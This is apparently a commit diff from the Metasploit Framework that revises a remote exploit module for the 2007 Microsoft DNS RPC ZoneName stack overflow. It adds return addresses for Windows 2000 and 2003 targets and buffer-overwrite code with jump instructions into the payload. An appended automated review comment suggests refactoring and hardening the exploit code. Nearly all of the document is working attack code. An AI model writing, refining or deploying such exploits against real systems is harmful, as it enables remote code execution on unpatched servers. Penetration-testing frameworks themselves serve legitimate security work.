Almost done...
git-svn-id: file:///home/svn/framework3/trunk@4683 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
66a87c8802
commit
17082dda1a
|
@ -37,12 +37,16 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
||||||
['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
|
['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
|
||||||
],
|
],
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'EXITFUNC' => 'thread'
|
||||||
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 1024,
|
'Space' => 1024,
|
||||||
|
|
||||||
# The payload doesn't matter, but make_nops() uses these too
|
# The payload doesn't matter, but make_nops() uses these too
|
||||||
'BadChars' => "\x00\x5c\x5f\x31\x32\x33\x34\x35\x36\x37",
|
'BadChars' => "\x00",
|
||||||
|
|
||||||
'StackAdjustment' => -3500,
|
'StackAdjustment' => -3500,
|
||||||
|
|
||||||
|
@ -50,12 +54,26 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
|
[ 'Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English',
|
||||||
|
{
|
||||||
|
'Addresses' => # Offsets must not overlap -4 or +9
|
||||||
|
[
|
||||||
|
[ 1213, 0x75022ac4 ], # Windows 2000 SP0-SP4 ws2help.dll
|
||||||
|
[ 1593, 0x7ffc0960 ], # Windows 2003 SP0 ??? (unreliable?)
|
||||||
|
[ 1633, 0x76a81a60 ], # Windows 2003 SP1-SP2 atl.dll
|
||||||
|
]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
|
||||||
# WS2HELP.DLL
|
# WS2HELP.DLL
|
||||||
[ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
||||||
|
|
||||||
# ATL.DLL (checked)
|
# Unknown, probably bad :(
|
||||||
[ 'Windows 2003 Server SP0 Checked/Debug English', { 'Off' => 1597, 'Ret' => 0x7669b5c5 } ],
|
[ 'Windows 2003 Server SP0 English', { 'Off' => 1593, 'Ret' => 0x7ffc0960 } ],
|
||||||
|
|
||||||
|
# ATL.DLL (no SafeSEH)
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 English', { 'Off' => 1633, 'Ret' => 0x76a81a60 } ],
|
||||||
|
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Apr 13 2007'
|
'DisclosureDate' => 'Apr 13 2007'
|
||||||
))
|
))
|
||||||
|
@ -89,13 +107,22 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
|
||||||
dcerpc_bind(handle)
|
dcerpc_bind(handle)
|
||||||
print_status("Bound to #{handle} ...")
|
print_status("Bound to #{handle} ...")
|
||||||
|
|
||||||
txt = Rex::Text.pattern_create(8192)
|
txt = Rex::Text.rand_text_alphanumeric(8192)
|
||||||
txt[0, payload.encoded.length] = payload.encoded
|
txt[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
off = target['Off']
|
if (target['Addresses'])
|
||||||
txt[ off ] = [target.ret].pack('V')
|
target['Addresses'].each do |ent|
|
||||||
txt[ off - 4, 2] = "\xeb\x06"
|
off, ret = ent
|
||||||
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
txt[ off ] = [ret].pack('V')
|
||||||
|
txt[ off - 4, 2] = "\xeb\x06"
|
||||||
|
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
||||||
|
end
|
||||||
|
else
|
||||||
|
off = target['Off']
|
||||||
|
txt[ off ] = [target.ret].pack('V')
|
||||||
|
txt[ off - 4, 2] = "\xeb\x06"
|
||||||
|
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
||||||
|
end
|
||||||
|
|
||||||
req = ''
|
req = ''
|
||||||
|
|
||||||
|
|
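Review bot: The `else` branch of the new `if (target['Addresses'])` block repeats the four overwrite lines of the loop body verbatim, so the two target formats will drift apart the next time the layout is touched; normalizing the legacy `Off`/`Ret` target into the same shape removes the duplicate, e.g. `addrs = target['Addresses'] || [ [ target['Off'], target.ret ] ]` followed by `addrs.each do |off, ret|` and a single copy of the body. Destructuring in the block parameters also makes the separate `off, ret = ent` line unnecessary, and the parentheses around the `if` condition are not idiomatic Ruby. The invariant stated in the `'Addresses'` comment in the second hunk (`Offsets must not overlap -4 or +9`) is only documented, never checked; a one-line comment at the loop noting that each entry also writes `off - 4 .. off - 3` and `off + 4 .. off + 8` would help whoever next edits that table, and a `raise` when two entries are closer than that spacing would catch a bad table before it is sent. The enclosing method starts and ends outside the hunk.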